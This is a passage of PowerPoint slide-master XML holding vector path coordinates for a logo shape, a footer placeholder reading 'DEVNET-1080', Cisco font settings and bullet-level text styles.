              <a:gd name="T116" fmla="*/ 1357 w 4066"/>
              <a:gd name="T117" fmla="*/ 1206 h 1365"/>
              <a:gd name="T118" fmla="*/ 1893 w 4066"/>
              <a:gd name="T119" fmla="*/ 1158 h 1365"/>
              <a:gd name="T120" fmla="*/ 1693 w 4066"/>
              <a:gd name="T121" fmla="*/ 1356 h 1365"/>
              <a:gd name="T122" fmla="*/ 1603 w 4066"/>
              <a:gd name="T123" fmla="*/ 115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6" h="1365">
                <a:moveTo>
                  <a:pt x="3679" y="626"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3659" y="674"/>
                  <a:pt x="3650" y="708"/>
                  <a:pt x="3650" y="728"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3636" y="753"/>
                  <a:pt x="3628" y="807"/>
                  <a:pt x="3628" y="826"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3628" y="849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3665" y="907"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3684" y="936"/>
                  <a:pt x="3662" y="944"/>
                  <a:pt x="3718" y="964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3738" y="964"/>
                  <a:pt x="3752" y="950"/>
                  <a:pt x="3763" y="919"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3763" y="910"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3763" y="838"/>
                  <a:pt x="3789" y="739"/>
                  <a:pt x="3811" y="668"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3811" y="637"/>
                  <a:pt x="3840" y="541"/>
                  <a:pt x="3938" y="307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3938" y="282"/>
                  <a:pt x="3961" y="234"/>
                  <a:pt x="4006" y="160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4043" y="98"/>
                  <a:pt x="4054" y="107"/>
                  <a:pt x="4065" y="98"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4065" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4051" y="48"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4051" y="48"/>
                  <a:pt x="4037" y="34"/>
                  <a:pt x="4000" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4000" y="17"/>
                  <a:pt x="3964" y="0"/>
                  <a:pt x="3950" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3938" y="0"/>
                  <a:pt x="3916" y="22"/>
                  <a:pt x="3893" y="67"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3679" y="626"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3507" y="1308"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3507" y="1333"/>
                  <a:pt x="3481" y="1342"/>
                  <a:pt x="3509" y="1359"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3554" y="1359"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3605" y="1333"/>
                  <a:pt x="3622" y="1291"/>
                  <a:pt x="3684" y="1150"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3684" y="1119"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3684" y="1099"/>
                  <a:pt x="3701" y="1091"/>
                  <a:pt x="3659" y="1062"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3648" y="1062"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3566" y="1062"/>
                  <a:pt x="3546" y="1102"/>
                  <a:pt x="3507" y="1266"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3507" y="1308"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2183" y="1359"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2149" y="1359"/>
                  <a:pt x="2101" y="1328"/>
                  <a:pt x="2039" y="1268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2009" y="1232"/>
                  <a:pt x="1992" y="1195"/>
                  <a:pt x="1989" y="1161"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1989" y="1065"/>
                  <a:pt x="1984" y="1012"/>
                  <a:pt x="2070" y="618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2084" y="581"/>
                  <a:pt x="2087" y="558"/>
                  <a:pt x="2146" y="307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2169" y="203"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2177" y="160"/>
                  <a:pt x="2180" y="158"/>
                  <a:pt x="2180" y="158"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2183" y="155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2189" y="155"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2271" y="177"/>
                  <a:pt x="2310" y="208"/>
                  <a:pt x="2310" y="245"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2310" y="276"/>
                  <a:pt x="2307" y="290"/>
                  <a:pt x="2262" y="395"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2217" y="499"/>
                  <a:pt x="2231" y="443"/>
                  <a:pt x="2169" y="747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2155" y="818"/>
                  <a:pt x="2141" y="952"/>
                  <a:pt x="2124" y="1153"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2135" y="1268"/>
                  <a:pt x="2144" y="1305"/>
                  <a:pt x="2169" y="1305"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2183" y="1359"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2485" y="392"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2471" y="395"/>
                  <a:pt x="2457" y="446"/>
                  <a:pt x="2448" y="544"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2465" y="550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2493" y="547"/>
                  <a:pt x="2530" y="513"/>
                  <a:pt x="2570" y="451"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2570" y="443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2567" y="423"/>
                  <a:pt x="2541" y="406"/>
                  <a:pt x="2491" y="389"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2485" y="392"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2400" y="1305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2392" y="1283"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2386" y="1175"/>
                  <a:pt x="2389" y="1108"/>
                  <a:pt x="2395" y="1077"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2386" y="1054"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2386" y="1012"/>
                  <a:pt x="2389" y="992"/>
                  <a:pt x="2395" y="989"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2406" y="921"/>
                  <a:pt x="2417" y="885"/>
                  <a:pt x="2426" y="879"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2429" y="835"/>
                  <a:pt x="2454" y="776"/>
                  <a:pt x="2499" y="702"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2496" y="680"/>
                  <a:pt x="2451" y="649"/>
                  <a:pt x="2361" y="612"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2338" y="615"/>
                  <a:pt x="2316" y="663"/>
                  <a:pt x="2299" y="759"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2248" y="969"/>
                  <a:pt x="2228" y="1122"/>
                  <a:pt x="2239" y="1209"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2248" y="1271"/>
                  <a:pt x="2256" y="1302"/>
                  <a:pt x="2268" y="1300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2310" y="1345"/>
                  <a:pt x="2355" y="1364"/>
                  <a:pt x="2409" y="1359"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2400" y="1305"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3092" y="778"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3052" y="829"/>
                  <a:pt x="3049" y="829"/>
                  <a:pt x="3049" y="829"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3047" y="829"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3038" y="835"/>
                  <a:pt x="3024" y="859"/>
                  <a:pt x="3001" y="907"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2984" y="924"/>
                  <a:pt x="2945" y="1003"/>
                  <a:pt x="2880" y="1139"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2812" y="1294"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2787" y="1353"/>
                  <a:pt x="2784" y="1356"/>
                  <a:pt x="2784" y="1356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2781" y="1359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2759" y="1359"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2716" y="1359"/>
                  <a:pt x="2680" y="1342"/>
                  <a:pt x="2654" y="1311"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2626" y="1294"/>
                  <a:pt x="2609" y="1252"/>
                  <a:pt x="2609" y="1187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2595" y="862"/>
                  <a:pt x="2575" y="702"/>
                  <a:pt x="2553" y="702"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2553" y="694"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2558" y="683"/>
                  <a:pt x="2570" y="677"/>
                  <a:pt x="2587" y="671"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2708" y="691"/>
                  <a:pt x="2770" y="719"/>
                  <a:pt x="2770" y="756"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2770" y="762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2764" y="778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776" y="804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2770" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2781" y="879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2776" y="933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2778" y="1088"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2781" y="1153"/>
                  <a:pt x="2784" y="1153"/>
                  <a:pt x="2784" y="1153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2787" y="1153"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2795" y="1153"/>
                  <a:pt x="2804" y="1133"/>
                  <a:pt x="2815" y="1094"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2849" y="1048"/>
                  <a:pt x="2897" y="955"/>
                  <a:pt x="2965" y="810"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3004" y="770"/>
                  <a:pt x="3041" y="697"/>
                  <a:pt x="3069" y="587"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3109" y="533"/>
                  <a:pt x="3137" y="508"/>
                  <a:pt x="3151" y="508"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3224" y="510"/>
                  <a:pt x="3244" y="536"/>
                  <a:pt x="3244" y="578"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3244" y="592"/>
                  <a:pt x="3233" y="612"/>
                  <a:pt x="3210" y="637"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3092" y="778"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3382" y="567"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3326" y="606"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3281" y="649"/>
                  <a:pt x="3247" y="691"/>
                  <a:pt x="3227" y="739"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3224" y="742"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3224" y="742"/>
                  <a:pt x="3222" y="745"/>
                  <a:pt x="3210" y="764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3165" y="843"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3103" y="989"/>
                  <a:pt x="3072" y="1099"/>
                  <a:pt x="3072" y="1173"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3072" y="1187"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3072" y="1212"/>
                  <a:pt x="3089" y="1243"/>
                  <a:pt x="3123" y="1277"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3154" y="1333"/>
                  <a:pt x="3193" y="1362"/>
                  <a:pt x="3238" y="1362"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3275" y="1353"/>
                  <a:pt x="3295" y="1345"/>
                  <a:pt x="3295" y="1339"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3329" y="1316"/>
                  <a:pt x="3346" y="1300"/>
                  <a:pt x="3346" y="1291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3399" y="1223"/>
                  <a:pt x="3433" y="1167"/>
                  <a:pt x="3450" y="1122"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3450" y="1116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3439" y="1108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3428" y="1116"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3371" y="1201"/>
                  <a:pt x="3309" y="1260"/>
                  <a:pt x="3241" y="1294"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3230" y="1294"/>
                  <a:pt x="3219" y="1285"/>
                  <a:pt x="3213" y="1271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3213" y="1175"/>
                  <a:pt x="3250" y="1043"/>
                  <a:pt x="3323" y="879"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3363" y="882"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3363" y="882"/>
                  <a:pt x="3385" y="885"/>
                  <a:pt x="3405" y="876"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3473" y="849"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3515" y="826"/>
                  <a:pt x="3546" y="790"/>
                  <a:pt x="3566" y="739"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3566" y="685"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3560" y="649"/>
                  <a:pt x="3509" y="609"/>
                  <a:pt x="3411" y="564"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3382" y="567"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3478" y="708"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3484" y="708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3490" y="714"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3450" y="801"/>
                  <a:pt x="3413" y="843"/>
                  <a:pt x="3380" y="843"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3357" y="835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3357" y="829"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3416" y="750"/>
                  <a:pt x="3456" y="708"/>
                  <a:pt x="3478" y="708"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="375" y="1147"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="1187"/>
                  <a:pt x="347" y="1263"/>
                  <a:pt x="257" y="1263"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178" y="1263"/>
                  <a:pt x="116" y="1206"/>
                  <a:pt x="116" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="981"/>
                  <a:pt x="169" y="913"/>
                  <a:pt x="257" y="913"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="913"/>
                  <a:pt x="364" y="967"/>
                  <a:pt x="370" y="1003"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="480" y="1003"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="474" y="938"/>
                  <a:pt x="420" y="818"/>
                  <a:pt x="257" y="818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="99" y="818"/>
                  <a:pt x="0" y="936"/>
                  <a:pt x="0" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1252"/>
                  <a:pt x="104" y="1359"/>
                  <a:pt x="257" y="1359"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="429" y="1359"/>
                  <a:pt x="482" y="1221"/>
                  <a:pt x="485" y="1147"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="375" y="1147"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="646" y="826"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="539" y="826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539" y="919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649" y="919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649" y="826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="646" y="826"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="646" y="969"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="539" y="969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539" y="1345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649" y="1345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649" y="969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="646" y="969"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="703" y="1068"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="703" y="1147"/>
                  <a:pt x="773" y="1173"/>
                  <a:pt x="813" y="1181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="824" y="1184"/>
                  <a:pt x="852" y="1189"/>
                  <a:pt x="861" y="1192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="900" y="1201"/>
                  <a:pt x="937" y="1209"/>
                  <a:pt x="937" y="1240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="937" y="1263"/>
                  <a:pt x="914" y="1280"/>
                  <a:pt x="869" y="1280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="827" y="1280"/>
                  <a:pt x="799" y="1257"/>
                  <a:pt x="796" y="1221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="691" y="1221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="694" y="1260"/>
                  <a:pt x="717" y="1353"/>
                  <a:pt x="869" y="1353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1010" y="1353"/>
                  <a:pt x="1050" y="1277"/>
                  <a:pt x="1050" y="1232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1050" y="1181"/>
                  <a:pt x="1019" y="1139"/>
                  <a:pt x="923" y="1116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="917" y="1113"/>
                  <a:pt x="886" y="1108"/>
                  <a:pt x="875" y="1105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="827" y="1094"/>
                  <a:pt x="813" y="1085"/>
                  <a:pt x="813" y="1060"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="813" y="1040"/>
                  <a:pt x="838" y="1029"/>
                  <a:pt x="863" y="1029"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="923" y="1029"/>
                  <a:pt x="934" y="1060"/>
                  <a:pt x="937" y="1077"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1041" y="1077"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1038" y="1040"/>
                  <a:pt x="1010" y="961"/>
                  <a:pt x="863" y="961"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="745" y="961"/>
                  <a:pt x="703" y="1020"/>
                  <a:pt x="703" y="1068"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1357" y="1209"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1349" y="1243"/>
                  <a:pt x="1326" y="1280"/>
                  <a:pt x="1278" y="1280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1219" y="1280"/>
                  <a:pt x="1191" y="1229"/>
                  <a:pt x="1191" y="1158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1191" y="1105"/>
                  <a:pt x="1211" y="1037"/>
                  <a:pt x="1278" y="1037"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1321" y="1037"/>
                  <a:pt x="1346" y="1068"/>
                  <a:pt x="1354" y="1099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1462" y="1099"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1456" y="1040"/>
                  <a:pt x="1411" y="958"/>
                  <a:pt x="1278" y="958"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1160" y="958"/>
                  <a:pt x="1078" y="1035"/>
                  <a:pt x="1078" y="1156"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1078" y="1278"/>
                  <a:pt x="1160" y="1353"/>
                  <a:pt x="1278" y="1353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1417" y="1353"/>
                  <a:pt x="1456" y="1266"/>
                  <a:pt x="1462" y="1206"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1357" y="1206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1357" y="1209"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1693" y="1356"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1809" y="1356"/>
                  <a:pt x="1893" y="1280"/>
                  <a:pt x="1893" y="1158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1893" y="1034"/>
                  <a:pt x="1809" y="961"/>
                  <a:pt x="1693" y="961"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1575" y="961"/>
                  <a:pt x="1493" y="1037"/>
                  <a:pt x="1493" y="1158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1493" y="1280"/>
                  <a:pt x="1575" y="1356"/>
                  <a:pt x="1693" y="1356"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1778" y="1158"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1778" y="1221"/>
                  <a:pt x="1752" y="1280"/>
                  <a:pt x="1690" y="1280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1631" y="1280"/>
                  <a:pt x="1603" y="1229"/>
                  <a:pt x="1603" y="1158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1603" y="1108"/>
                  <a:pt x="1623" y="1037"/>
                  <a:pt x="1690" y="1037"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1752" y="1037"/>
                  <a:pt x="1778" y="1096"/>
                  <a:pt x="1778" y="1158"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5222534" y="4946905"/>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CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="610729"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>DEVNET-1080</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19055242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174621" indent="-174621">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1110"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342892" indent="-138110">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="460364" indent="-126997">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="628634" indent="-134935">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="739757" indent="-115885">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="12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dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277519707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2_Title Slide">
